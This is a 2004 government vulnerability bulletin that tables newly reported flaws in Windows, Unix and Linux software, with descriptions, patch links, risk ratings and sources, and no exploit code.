Summary of Security Items from August 18 through August 31, 2004
The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. NVD is sponsored by CISA. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.
Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:
- High: vulnerabilities with a CVSS base score of 7.0–10.0
- Medium: vulnerabilities with a CVSS base score of 4.0–6.9
- Low: vulnerabilities with a CVSS base score of 0.0–3.9
Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis.
This bulletin provides a summary of new or updated vulnerabilities, exploits, trends and viruses identified between August 18 and August 31, 2004. Updates to items appearing in previous bulletins are listed in bold text.The text in the Risk column appears in red for vulnerabilities ranking High. The Recent Exploit/Technique table contains a "Workaround or Patch Available" column that indicates whether a workaround or patch has been published for the vulnerability which the script exploits.
Bugs,
Holes, & Patches
The table below summarizes vulnerabilities that have been identified, even if they are not being exploited. Complete details about patches or workarounds are available from the source of the information or from the URL provided in the section. CVE numbers are listed where applicable. Vulnerabilities that affect both Windows and Unix Operating Systems are included in the Multiple Operating Systems section.
Note: All the information included in the
following tables has been discussed in newsgroups and
on web sites.
Risk is defined as follows:
- High - A high-risk vulnerability is defined as one that will allow an intruder to immediately gain privileged access (e.g., sysadmin or root) to the system or allow an intruder to execute code or alter arbitrary system files. An example of a high-risk vulnerability is one that allows an unauthorized user to send a sequence of instructions to a machine and the machine responds with a command prompt with administrator privileges.
- Medium - A medium-risk vulnerability is defined as one that will allow an intruder immediate access to a system with less than privileged access. Such vulnerability will allow the intruder the opportunity to continue the attempt to gain privileged access. An example of medium-risk vulnerability is a server configuration error that allows an intruder to capture the password file.
- Low - A low-risk vulnerability is defined as one that will provide information to an intruder that could lead to further compromise attempts or a Denial of Service (DoS) attack. It should be noted that while the DoS attack is deemed low from a threat potential, the frequency of this type of attack is very high. DoS attacks against mission-critical nodes are not included in this rating and any attack of this nature should instead be considered to be a "High" threat.
Vendor & Software Name | Vulnerability - Impact Patches - Workarounds Attacks Scripts | Common Name | Risk | Source |
aGSM 2.35 c | A buffer overflow vulnerability exists in the server information parsing routines for Half-Life game servers due to a boundary error when receiving No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | aGSM Half-Life Server Info Response Buffer Overflow | High | Secunia Advisory, SA12334, August 24, 2004 |
Internet Chat Server 1.61 | A remote Denial of Service vulnerability exists due to insufficient sanitization of user-supplied input.
No workaround or patch available at time of publishing. An exploit script has been published. | Bird Chat Remote Denial of Service | Low | Securiteam, August 25, 2004 |
Access Control Server Solution Engine, Secure Access Control Server 3.2 (3), 3.2 (2), 3.2, Secure ACS for Windows Server 3.2 | Multiple vulnerabilities exist: a remote Denial of Service vulnerability exists in the web-based management interface (CSAdmin); a remote Denial of Service vulnerability exists when processing LEAP (Light Extensible Authentication Procotol) authentication requests when the device is configured as a LEAP RADIUS proxy; a vulnerability exists when handling NDS (Novell Directory Services) users, which could let a remote malicious user bypass authentication; and a vulnerability exists in the ACS administration web services, which could let a remote malicious user bypass authentication.
Workaround and patches available at: http://www.cisco.com/warp/public/707/cisco-sa-20040825-acs.shtml There is no exploit code required. | Secure Access Control Server Multiple Remote Vulnerabilities | Low/Medium (Medium if authentication can be bypassed) | Cisco Security Advisory, 61603, August 25, 2004 |
Easy File Sharing Web Server 1.2, 1.25 | Several vulnerabilities exist: a vulnerability exists due to insufficient restrictions on the web server's virtual folders, which could let a remote malicious user obtain sensitive information; and a remote Denial of Service vulnerability exists when a malicious user submits several large HTTP requests.
No workaround or patch available at time of publishing. There is no exploit code required. | Easy File Sharing Web Server Information Disclosure & Remote Denial of Service | Low/Medium (Medium if sensitive information can be obtained) | GulfTech Security Research Advisory, August 24, 2004 |
Gadu-Gadu Instant Messenger 6.0 | A vulnerability exists because a link can be created with a specially crafted filename, which could let a remote malicious user send a file with a spoofed file extension.
No workaround or patch available at time of publishing. There is not exploit code required; however, a Proof of Concept exploit has been published. | Gadu-Gadu Spoofed File Extension | Medium | SecurityTracker Alert ID, 1011037, August 24, 2004 |
WhatsUp Gold 7.0 4, 7.0 3, 7.0, 8.0 3, 8.0 1, 8.0 | A buffer overflow vulnerably exists in the '_maincfgret.cgi' script due to a failure to validate user-supplied string lengths, which could let a remote malicious user execute arbitrary code.
Upgrades available at: We are not aware of any exploits for this vulnerability. | WhatsUp Gold Remote Buffer Overflow CVE Name: CAN-2004-0798 | High | iDEFENSE Security Advisory, August 25, 2004 |
Keene Digital Media Server 1.0.2 | A Directory Traversal vulnerability exists when files are requested outside of the webroot of the application using hex encoded character sequences, which could let a remote malicious user obtain sensitive information.
No workaround or patch available at time of publishing. There is no exploit code required; however a Proof of Concept exploit has been published. | Keene Digital Media Server Directory Traversal | Medium | Securiteam, August 30, 2004 |
Ground Control II 1.0 .0.7 | A remote Denial of Service vulnerability exists when a game client or server receives a packet larger than 512 bytes. No workaround or patch available at time of publishing. Proof of Concept exploit script has been published. | Ground Control II Remote Denial of Service | Low | Securiteam, August 30, 2004 |
Merak Mail Server 7.4.5 | Multiple vulnerabilities exist: several Cross-Site Scripting vulnerabilities exist due to insufficient validation of user-supplied input in a number of variables, which could let a remote malicious user execute arbitrary HTML and script code; a vulnerability exists because specially crafted HTML can be injected directly into a message or included in the subject field, which could let a remote malicious user execute arbitrary code; a vulnerability exists in 'adress.html' or 'calendar.html' when a remote malicious user submits specially crafted parameters which results in the disclosure of sensitive information; a vulnerability exists because a remote malicious user can download any file with a '.php' extension which results in the disclosure of sensitive information; and a vulnerability exists in 'calendar.html' because a remote malicious user can inject SQL commands.
Upgrade available at: There is no exploit code required; however, Proofs of Concept exploits have been published. | Merak Mail Server Webmail Multiple Vulnerabilities | Medium/High
(High if arbitrary code can be executed) | Securiteam, August 19, 2004 |
Internet Explorer 5.0, 6.0, SP1 | A vulnerability exists because an IFRAME that is accessible in the same domain may be used to change the URI to the location of a file or directory, which could let a malicious user obtain sensitive information.
No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | Internet Explorer Resource Detection | Medium | Bugtraq, August 24, 2004 |
Internet Explorer 5.5, SP1&SP2. 6.0, SP1 | A vulnerability exists due to insufficient validation of drag and drop events issued from the 'Internet' zone, which could let a malicious user execute arbitrary code. No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | Internet Explorer Drag & Drop File Installation | High | Secunia Advisory, SA12321 August 19, 2004 |
Internet Explorer 6.0 SP1 | A cross security domain script vulnerability exists when a malicious MHTML file is submitted, which could let a remote malicious user execute arbitrary code.
No workaround or patch available at time of publishing. Proof of Concept exploit script has been published. | Internet Explorer MHTML Content-Location Cross Security Domain Scripting | High | Bugtraq, August 19, 2004 |
Outlook Express 6.0, SP1 | A vulnerability exists in the 'bcc:' field due to an error when sending multipart Hotfix available at: http://support.microsoft.com/default.aspx?scid=kb;EN-US;843555 There is no exploit code required. | Outlook Express BCC Field Information Disclosure | Medium | Secunia Advisory, SA12376, August 25, 2004 |
Small Business Server 2000, 2003, Windows 2000 Advanced Server, SP1-SP4, 2000 Datacenter Server, SP1-SP4, 2000 Professional, SP1-SP4, 2000 Server, SP1-SP4, 2000 Server Japanese Edition, 2003 Datacenter Edition, 64-bit, | A time spoofing vulnerability exists in the Network Time Protocol (NTP) implementation because the time on the domain controller can be altered, which could let a remote malicious user cause a Denial of Service and possibly other attacks. Microsoft has released a knowledge base article (884776) describing methods of mitigation. This article recommends that a hardware time source be used on the authoritative time server, instead of an unauthenticated network time source. We are not aware of any exploits for this vulnerability. | Microsoft NTP Time Synchronization Spoof | Low | SecurityFocus, August 19, 2004 |
Gaucho 1.4 build 145 | A buffer overflow vulnerability exists in the 'Content-Type:"'header due to insufficient validation, which could let a remote malicious user execute arbitrary code.
Upgrade available at: http://homepage1.nifty.com/nakedsoft/Gaucho/G-14B151.zip Proof of Concept exploit script has been published. | Gaucho POP3 Email Header Buffer Overflow | High | SIG^2 Vulnerability Research Advisory, August 23, 2004 |
Web Log Analyzer 1.6 | A Cross-Site Scripting vulnerability exists in the 'user-agent' and referer' fields due to insufficient validation of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code.
No workaround or patch available at time of publishing. There is not exploit code required; however, a Proof of Concept exploit has been published. | Web Log Analyzer Cross-Site Scripting | High | SecurityTracker 1011010, August 21, 2004 |
Winamp 2.4, 2.5 e, 2.5 E, 2.6 4, 2.10, 2.24, 2.50, 2.60 (lite), 2.60 (full), 2.61 (full), 2.62 (standard), 2.64 (standard), 2.65, 2.70 (full), 2.70, 2.71-2.81, 2.91, 3.0, 3.1, 5.0 1- 5.04 | A vulnerability exists due to insufficient restrictions on Winamp skin zip files (.wsz), which could let a remote malicious user execute arbitrary code. Upgrades available at: http://www.winamp.com/player/ This issue is known to be exploited in the wild and a Proof of Concept exploit has been published. | Winamp Skin File Remote Code Execution | High | Bugtraq, August 26, 2004 |
Integrity Protection Driver 1.2, 1.3, 1.4 | A Denial of Service vulnerability exists due to improperly validation of some pointer references in some of the application's kernel hooks. No workaround or patch available at time of publishing. We are not aware of any exploits for this vulnerability. | Integrity Protection Driver Local Denial of Service | Low | Next Generation Security Technologies Security Advisory, NGSEC-2004-6, August 14, 2004 |
Painkiller 1.3.1 | A buffer overflow vulnerability exists due to insufficient boundary checking when processing a password supplied by a client during the connection No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | Painkiller Remote Buffer Overflow | Low/High (High if arbitrary code can be executed) | Securiteam, August 29, 2004 |
RealVNC 4.0 | A remote Denial of Service vulnerability exists when a malicious user establishes a large amount of connections. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | RealVNC Server Remote Denial of Service | Low | SecurityTracker Alert ID: 1011072, August 26, 2004 |
Regmon 6.11 | A Denial of Service vulnerability exists due to insufficient validation of some argument pointers.
No workaround or patch available at time of publishing. A Proof of Concept exploit script has been published. | Regmon Local Denial of Service | Low | Next Generation Security Technologies Security Advisory, NGSEC-2004-7, August 14, 2004 |
Window Washer 5.5 | A vulnerability exists in the 'AddBleach to Wash' function because the content of erased files is not properly overwritten, which could let a malicious user person modify system information. No workaround or patch available at time of publishing. There is no exploit code required. | Webroot Window Washer Erased Files | Medium | Secunia Advisory, SA12380, August 26, 2004 |
BadBlue 2.5
| A remote Denial of Service vulnerability exists when processing multiple connections. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit script has been published. | BadBlue Webserver Denial of Service | Low | GulfTech Security Research Advisory, August 18, 2004 |
ZoneAlarm 2.1-2.6, 3.0, 3.1, 3.7 .202, 4.0, 4.5 .538.001, ZoneAlarm for Windows 95 1.0, 2.2-2.6, ZoneAlarm for Windows 98 2.1-2.6, ZoneAlarm For Windows NT 4.0 2.1-4.0 2.6, ZoneAlarm for Windows XP 2.6, ZoneAlarm Plus 4.0, 4.5.538.001, ZoneAlarm Pro 2.4, 2.6, 3.0, 3.1, 4.0, 4.5.538.001, 4.5, 5.0.590.015 | A vulnerability exists due to weak default permissions in the folder used to store log and configuration files, which could let a malicious user delete log entries in order to hide malicious activities.
No workaround or patch available at time of publishing. There is not exploit code required. | ZoneAlarm/ZoneAlarm Pro Weak Default Permissions | Medium | Bugtraq, August 20, 2004 |
| UNIX / Linux Operating Systems Only | ||||
Vendor & Software Name | Vulnerability - Impact Patches - Workarounds Attacks Scripts | Common Name | Risk | Source |
Adobe Acrobat Reader 5.05 and 5.06 | An input validation and boundary error vulnerability exists in in the uudecoding feature of Adobe Acrobat Reader, which can be exploited by a malicious user to compromise a user's system. An input validation error injection of arbitrary shell commands. The boundary vulnerability can be exploited to cause a buffer overflow via a malicious PDF document with an overly long filename. Successful exploitation may allow execution of arbitrary code, but requires that a user is tricked into opening a malicious document. Update to version 5.09 for UNIX available at: http://www.adobe.com/products/acrobat/readstep2.html Gentoo: http://security.gentoo.org/glsa/glsa-200408-14.xml RedHat: http://rhn.redhat.com/errata/RHSA-2004-432.html We are not aware of any exploits for this vulnerability. | Adobe Acrobat Reader Shell Command Injection and Buffer Overflow Vulnerability CVE Names: | High | Secunia, SA12285, August 13, 2004 iDEFENSE Advisories 08.12.04 Gentoo Linux Security Advisory GLSA 200408-14, August 15, 2004 RedHat Security Advisory, RHSA-2004:432-08, August 26,2 004 |
PlaySMS 0.6, 0.7 | An input validation vulnerability exists in the 'valid()' function if the 'magic_quotes_gpc' setting if set to 'Off' due to insufficient verification, which could let a remote malicious user execute arbitrary SQL commands. Upgrades available at: Proof of Concept exploit script has been published. | PlaySMS SQL Input Validation | High | Securiteam, August 18, 2004 |
OS X Safari | A vulnerability exists in the 'Show in Finder' option, which could let a malicious user execute arbitrary code. Update available at: We are not aware of any exploits for this vulnerability. | Mac OS X Safari 'Show in Finder' CVE Name: | High | US-CERT Vulnerability Note VU#773190, August 24,2 004 |
MySQL Backup Pro 1.0.5-1.0.7 | A vulnerability exists in the 'getbackup()' function, which could let a remote malicious user obtain sensitive information.
Upgrades available at: We are not aware of any exploits for this vulnerability. | MySQL Backup Pro Information Disclosure | Medium | SecurityFocus, August 20, 2004 |
Gallery 1.4.4 | A vulnerability exists in the 'set_time_limit' function due to insufficient validation of user-supplied input, which could let a remote malicious user execute arbitrary code.
Upgrade available at: http://prdownloads.sourceforge.net/gallery/ Proof of Concept exploit has been published. | Gallery Input Validation | High | SecurityTracker Alert ID: 1010971, August 18, 2004 |
SARA | A remote buffer overflow vulnerability exists due to insufficient sanitization of user-supplied data, which could let a remote malicious user execute arbitrary code.
No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | SARA Remote Buffer Overflow | High | Bugtraq, August 20, 2004 |
Inter7 Courier-IMAP 1.6, 1.7, 2.0 .0, 2.1- 2.1.2, 2.2 .0. 2.2.1 | A format string vulnerability exists in the 'auth_debug()' function used for login debugging, which could let a remote malicious user execute arbitrary code. Upgrade available at: http://prdownloads.sourceforge.net/courier/courier-imap-3.0.7.tar.bz2 Gentoo: http://security.gentoo.org/glsa/glsa-200408-19.xml Trustix: ftp://ftp.trustix.org/pub/trustix/updates/ We are not aware of any exploits for this vulnerability. | Courier-IMAP Remote Format String CVE Name: | High | iDEFENSE Security Advisory 08.18.04 |
Hafiye 1.0 | A vulnerability exists due to insufficient filtering when a packet payload is displayed, which could let a remote malicious user execute arbitrary code.
No workaround or patch available at time of publishing. We are not aware of any exploits for this vulnerability. | Hafiye Terminal Escape Sequence | High | SecurityFocus, August 23, 2004 |
FIDOGATE 4.4.5-4.4.7, 4.4.9 | An input validation vulnerability exists in '/src/common/log.c' which could let a malicious user obtain elevated privileges. Upgrades available at: http://prdownloads.sourceforge.net/ There is no exploit code required. | FIDOGATE Input Validation | Medium | SecurityTracker Alert ID: 1011021, August 23, 2004 |
Gentoo | Multiple vulnerabilities were reported in Gaim in the processing of the MSN protocol. A remote user may be able to execute arbitrary code on the target system. Several remotely exploitable buffer overflows were reported in the MSN protocol parsing functions. Gentoo: http://security.gentoo.org/glsa/glsa-200408-12.xml SuSE: http://www.suse.de/de/security/2004_25_gaim.html Mandrake: http://www.mandrakesecure.net/en/ftp.php Rob Flynn: Slackware: We are not aware of any exploits for this vulnerability. | Gaim Buffer Overflows in Processing MSN Protocol
CVE Name: | High | SecurityTracker, 1010872, August 5, 2004 Mandrakelinux Security Update Advisory, MDKSA-2004:081, August 13, 2004 Slackware Security Advisory, SSA:2004-239-01, August 26, 2004 |
a2ps 4.13 | A vulnerability exists in filenames due to insufficient validation of shell escape characters, which could let a malicious user execute arbitrary commands. There is no exploit code required; however, a Proof of Concept exploit has been published. | GNU a2ps Command Injection | High | Securiteam, August 29, 2004 |
Job Management Partner-1 6 & 7 | Multiple vulnerabilities exist: a vulnerability exists in the login authentication procedure, which could let a malicious user obtain unauthorized access; and a remote Denial of Service vulnerability exists when a malicious user submits a specially crafted reset packet.
Upgrades available at:/http://www.hitachi-support.com/security_e/ We are not aware of any exploits for this vulnerability. | Hitachi Job Management Partner 1 Authentication Flaw & Remote Denial of Service | Low/Medium (Medium if unuauthorized access can be obtained) | HS04-004-01 & HS04-005-01, August 23, 2004 |
IMWheel 1.0 pre11 | A vulnerability exists due to a race condition and insecure No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | IMWheel Insure File Creation | Low/Medium (Medium is elevated privileges can be obtained) | Computer Academic Underground Security Advisory, CAU-2004-0002, August 26, 2004 |
sredird 1.0, 1.1.6-1.1.8, 2.0, 2.1, 2.2, 2.2.1; | Two vulnerabilities exist: a format string vulnerability exists in the 'LogMsg()' function due to insufficient sanitization, which could let a remote malicious user execute arbitrary code; and a buffer overflow vulnerability exists in the 'HandleCPCCommand()' function due to insufficient sanitization, which could let a remote malicious user execute arbitrary code.
Upgrade available at: We are not aware of any exploits for this vulnerability. | SERCD, SREDIRD Format String & Buffer Overflow | High | SecurityTracker Alert ID: 1011038, August 24, 2004 |
Ulog-php 0.8, 0.8.1 | An input validation vulnerability exists in 'port.php' due to insufficient validation of the 'proto' parameter, which could let a remote malicious user execute arbitrary SQL commands.
Upgrades available at: http://www.inl.fr/download/ulog-php-0.8.2.tar.gz There is no exploit code required. | Ulog-php Input Validation | High | SecurityFocus, August 23, 2004 |
vpopmail (vchkpw) 3.4.1-3.4.11, 4.5, 4.6, 4.7, 4.8, 4.9, 4.9.10, 4.10, 5.2.1, 5.2.2, 5.3.20-5.3.30, 5.4-5.4.2 | Multiple buffer overflow and format string vulnerabilities exist in the 'vsybase.c' file, which could let a malicious user cause a Denial of Service, obtain unauthorized access, or execute arbitrary code.
Upgrades available at: We are not aware of any exploits for this vulnerability. | Inter7 Vpopmail Vsybase.c Multiple Vulnerabilities | Low/ Medium/High Low if a DoS; Medium if unauthorized access can be obtained; and High if arbitrary code can be executed. | Bugtraq, August 17, 2004 |
vpopmail (vchkpw) 3.4.1-3.4.11, 4.5-4.10, 5.2.1, 5.2.2, 5.3.20-5.3.30, 5.4-5.4.5 | An SQL injection vulnerability exists due to insufficient sanitization of user-supplied input data before using it in an SQL query, which could let a remote malicious user insert additional SQL commands into data passed into POP/IMAP login, SMTP AUTH, or a QmailAdmin login. Note: Vpopmail is only vulnerable if SQL servers are utilized by the application. Sites using the 'cdb' backend for data storage are not affected. Upgrades available at: There is no exploit code required. | Vpopmail SQL Injection | Medium | SecurityFocus, August 20, 2004 |
XV 3.10 a | Multiple vulnerabilities exist: a buffer overflow vulnerability exists in the 'xvbmp.c' source file, which could let a remote malicious user execute arbitrary code; multiple heap overflow vulnerabilities exist in the 'xviris.c' source file due to integer handling problems, which could let a remote malicious user execute arbitrary code; a heap overflow vulnerability exists in the 'xvpcx.c' source file due to integer handling problems, which could let a remote malicious user execute arbitrary code; and a heap overflow vulnerability exists in the 'xvpm.c' source file due to integer handling problems, which could let a remote malicious user execute arbitrary code.
No workaround or patch available at time of publishing. Exploit script has been published. | XV Multiple Buffer Overflow and Integer Handling | High | Bugtraq, August 24, 2004 |
Linux kernel 2.4 through 2.4.26, 2.6 through 2.6.7 | A vulnerability exists in the Linux kernel in the processing of 64-bit file offset pointers thus allowing a local malicious user to view kernel memory. The kernel's file handling API does not properly convert 64-bit file offsets to 32-bit file offsets. In addition, the kernel provides insecure access to the file offset member variable. As a result, a local user can gain read access to large portions of kernel memory. Fedora: http://download.fedora.redhat.com/pub/fedora/linux/core/updates/2/ RedHat: http://rhn.redhat.com/ SuSE: http://www.suse.de/de/security/2004_24_kernel.html Gentoo:http://security.gentoo.org/glsa/glsa-200408-24.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php SGI: ftp://patches.sgi.com/support/free/security/patches/ProPack/3/ Trustix: ftp://ftp.trustix.org/pub/trustix/updates/ A Proof of Concept exploit script has been published. | Linux Kernel 64-bit to 32-bit File Offset Conversion Errors Disclose Kernel Memory to Local Users CVE Name: | High | ISEC Security Research, August 4, 2004 SGI Security Advisory, 20040804-01-U, August 26, 2004 Gentoo Linux Security Advisory GLSA 200408-24, August 25, 2004 Mandrakelinux Security Update Advisory, August 26, 2004 Trustix Secure Linux Security Advisory, TSLSA-2004-0041, August 9, 2004 |
RXVT-Unicode 3.4, 3.5 | A vulnerability exist due to a failure to properly close file descriptors when spawning new child terminal windows, which could let a malicious user obtain sensitive information.
Update available at: There is no exploit code required. | RXVT-Unicode Open File Descriptor Leakage | Medium | Secunia Advisory, SA1229, August 16, 2004 |
FileZilla Server 0.7, 0.7.1; OpenBSD -current, 3.5; | A remote Denial of Service vulnerability during the decompression process exists due to a failure to handle malformed input. . Gentoo: http://security.gentoo.org/glsa/glsa-200408-26.xml FileZilla: http://sourceforge.net/project/showfiles.php?group_id=21558 OpenBSD: OpenPKG: ftp ftp.openpkg.org Trustix: ftp://ftp.trustix.org/pub/trustix/updates/ We are not aware of any exploits for this vulnerability. | Zlib Compression Library Remote Denial of Service CVE Name: | Low | SecurityFocus, August 25, 2004 |
Gentoo Linux 0.5, 0.7, 1.1 a, 1.2, 1.4, rc1-rc3; GNU glibc 2.0-2.0.6, 2.1, 2.1.1-6, 2.1.1, 2.1.2, 2.1.2-10, 2.1.3, 2.1.9 & greater, 2.2-2.2.5, 2.3-2.3.4 | A vulnerability exists in 'LD_DEBUG' on set user id (setuid) binaries, which could let a malicious user obtain sensitive information. Gentoo: http://security.gentoo.org/glsa/glsa-200408-16.xml We are not aware of any exploits for this vulnerability. | GLibC LD_DEBUG Information Disclosure | Medium | Gentoo Linux Security Advisory GLSA 200408-16, August 16, 2004 |
Gentoo Linux 1.4; | Multiple vulnerabilities exist: a buffer overflow vulnerability exists in the 'read_dib()' function when handling 8-bit RLE encoded BMP files, which could let a malicious user execute arbitrary code; and buffer overflow vulnerabilities exist in the in the XPM, GIF, and JPEG image file handlers, which could let a remote malicious user execute arbitrary code. Debian: http://security.debian.org/pool/updates/main/q/qt-copy/ Fedora: http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/ Gentoo: http://security.gentoo.org/glsa/glsa-200408-20.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php Slackware: href="ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/kde/qt-3.1.2-i486-4.tgz">ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/kde/qt-3.1.2-i486-4.tgz SuSE: ftp://ftp.suse.com/pub/suse/i386/update Trolltech Upgrade: http://www.trolltech.com/download/index.html TurboLinux: ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/ Proof of Concept exploit has been published. | Qt Image File Buffer Overflows CVE Names: | High | Secunia Advisory, SA12325, August 10, 2004 |
Gentoo Linux 1.4; | A vulnerability exists while validating cookie domains, which could let a remote malicious user hijack a target user's session. KDE: ftp://ftp.kde.org/pub/kde/security_patches Gentoo: http://security.gentoo.org/glsa/glsa-200408-23.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php There is no exploit code required. | KDE Konqueror Cookie Domain Validation CVE Name: | Medium | KDE Security Advisory, August 23, 2004 |
Gentoo Linux 1.4; | A vulnerability exists due to insufficient validation of ownership of temporary directories, which could let a malicious user cause a Denial of Service, overwrite arbitrary files, or obtain elevated privileges.
KDE: ftp://ftp.kde.org/pub/kde/security_patches/post-3.0.5b-kdelibs-kstandarddirs.patch Debian: http://security.debian.org/pool/updates/main/k/kdelibs/ Gentoo: http://security.gentoo.org/glsa/glsa-200408-13.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php There is no exploit code required. | KDE Insecure Temporary Directory Symlink CVE Name: | Low/Medium (Low if a DoS) | KDE Security Advisory,August 11, 2004 |
Gentoo Linux 1.4; | A vulnerability exists in DCOPServer due to insecure file creation, which could let a malicious user obtain elevated privileges or overwrite arbitrary files.
KDE: ftp://ftp.kde.org/pub/kde/security_patches/post-3.2.3-kdelibs-dcopserver.patch Gentoo: http://security.gentoo.org/glsa/glsa-200408-13.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php There is no exploit code required. | KDE DCOPServer Insecure Temporary File Creation CVE Name: | Medium | KDE Security Advisory,August 11, 2004 |
KDE 3.2.3 and prior | A frame injection vulnerability exists in the Konqueror web browser that allows websites to load web pages into a frame of any other frame-based web page that the user may have open. A malicious website could abuse Konqueror to insert its own frames into the page of an otherwise trusted website. As a result the user may unknowingly send confidential information intended for the trusted website to the malicious website. Source code patches have been made available which fix these vulnerabilities. Refer to advisory: http://www.kde.org/info/security/advisory-20040811-3.txt Mandrake: http://www.mandrakesecure.net/en/ftp.php A Proof of Concept exploit has been published. | Konqueror Frame Injection Vulnerability CVE Name: | Low | KDE Security Advisory 20040811-3, August 11, 2004 Mandrakelinux Security Update Advisory, MDKSA-2004:086, August 21, 2004 |
Linux kernel 2.4 .0-test1-test9, | A race condition vulnerability exists when a process is spawning, which could let a malicious user obtain sensitive information.
Gentoo: http://security.gentoo.org/glsa/glsa-200408-24.xml We are not aware of any exploits for this vulnerability. | Linux Kernel Race Condition | Medium | Gentoo Linux Security Advisory, GLSA 200408-24, August 25, 2004 |
Luke Mewburn lukemftp 1.5, TNFTPD 20031217; NetBSD Current, 1.3-1.3.3, 1.4 x86, 1.4, SPARC, arm32, Alpha, 1.4.1 x86, 1.4.1, SPARC, sh3, arm32, Alpha, 1.4.2 x86, 1,4.2, SPARC, arm32, Alpha, 1.4.3, 1.5 x86, 1.5, sh3, 1.5.1-1.5.3, 1.6, beta, 1.6-1.6.2, 2.0 | Several vulnerabilities exist in the out-of-band signal handling code due to race condition errors, which could let a remote malicious user obtain superuser privileges.
Luke Mewburn Upgrade: We are not aware of any exploits for this vulnerability. | TNFTPD Multiple Signal Handler Remote Privilege Escalation | High | NetBSD Security Advisory 2004-009, August 17, 2004 |
Mozilla Browser 1.7.2, | A vulnerability exists when the browser is configure to employ the 'Tabbed Browsing' functionality, which could let a remote malicious user conduct phishing attacks.
No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | Mozilla/Netscape/Firefox Browsers Content Spoofing | Medium | Bugtraq, August 26, 2004 |
Music daemon 0.1-0.3 | A vulnerability exists due to insufficient authentication of user-supplied commands, which could let a remote malicious user obtain sensitive information information or cause a Denial of Service.
No workaround or patch available at time of publishing. An exploit script has been published. | Music Daemon Information Disclosure | Low/Medium (Medium if sensitive information can be obtained) | Securiteam, August 26, 2004 |
MySQL 3.20 .x, 3.20.32 a, 3.21 .x, 3.22 .x, 3.22.26-3.22.30, 3.22.32, 3.23 .x, 3.23.2-3.23.5, 3.23.8-3.23.10, 3.23.22-3.23.34, 3.23.36-3.23.56, 3.23.58, 4.0.0-4.0.15, 4.0.18, 4.0.20, 4.1 .0-alpha, 4.1 .0-0, 4.1.2 -alpha, 4.1.3 -beta, 4.1.3 -0, 5.0 .0-alpha, 5.0 .0-0 | A buffer overflow vulnerability exists in the 'mysql_real_connect' function due to insufficient boundary checking, which could let a remote malicious user cause a Denial of Service and possibly execute arbitrary code. Note: Computers using glibc on Linux and BSD platforms may not be vulnerable to this issue. No workaround or patch available at time of publishing. We are not aware of any exploits for this vulnerability. | MySQL Mysql_real_connect Function Remote Buffer Overflow | High/Low (Low if a DoS) | Secunia Advisory, SA12305, August 20, 2004 |
MySQL 3.23.49, 4.0.20 | A vulnerability exists in the 'mysqlhotcopy' script due to predictable files names of temporary files, which could let a malicious user obtain elevated privileges. Debian: http://security.debian.org/pool/updates/main/m/ There is no exploit code required. | Medium | Debian Security Advisory, DSA 540-1, August 18, 2004 | |
OpenBSD 3.2-3.5 | A Denial of Service vulnerability exists in the implementation of bridging in OpenBSD due to insufficient validation of ICMP packets. Patches available at: ftp://ftp.openbsd.org/pub/OpenBSD/patches/ There is no exploit code required. | OpenBSD Bridged Network ICMP Denial of Service | Low | Bugtraq, August 25, 2004 |
OpenBSD –current, 3.3, 3.4 | Multiple remote Denial of Service vulnerabilities exist when processing certain malformed payloads. Patches available at: ftp://ftp.openbsd.org/pub/OpenBSD/patches/ We are not aware of any exploits for this vulnerability. | OpenBSD isakmpd Multiple Unspecified Remote Denial of Service CVE Names: | Low | SecurityFocus, March 23, 2004 US-CERT Vulnerability Notes VU#223273, VU#349113, VU#524497, VU#785945, VU#996177, August 27, 2004 |
PHP Code Snippet Library 0.8 | Multiple Cross-Site Scripting vulnerabilities exist in 'index.php' due to insufficient sanitization of the 'cat_select' and 'show' parameters, which could let a remote malicious user execute arbitrary HTML and script code.
No workaround or patch available at time of publishing. Proofs of Concept exploits have been published. | PHP Code Snippet Library Multiple Cross-Site Scripting | High | Secunia Advisory, SA12370, August 25, 2004 |
Cacti 0.5, 0.6-0.6.8, 0.8-0.8.5; Gentoo Linux 1.4 | A vulnerability exists in the 'auth_login.php' script due to insufficient validation of user-supplied input in the username or password fields, which could let a remote malicious user bypass the authentication interface. The vendor has issued a fix, available via CVS. Gentoo: http://security.gentoo.org/glsa/glsa-200408-21.xml Proofs of Concept exploits have been published. | RaXnet Cacti Auth_Login.PHP Authentication Bypass | Medium | SecurityTracker Alert ID: 1010961, August 17, 2004 |
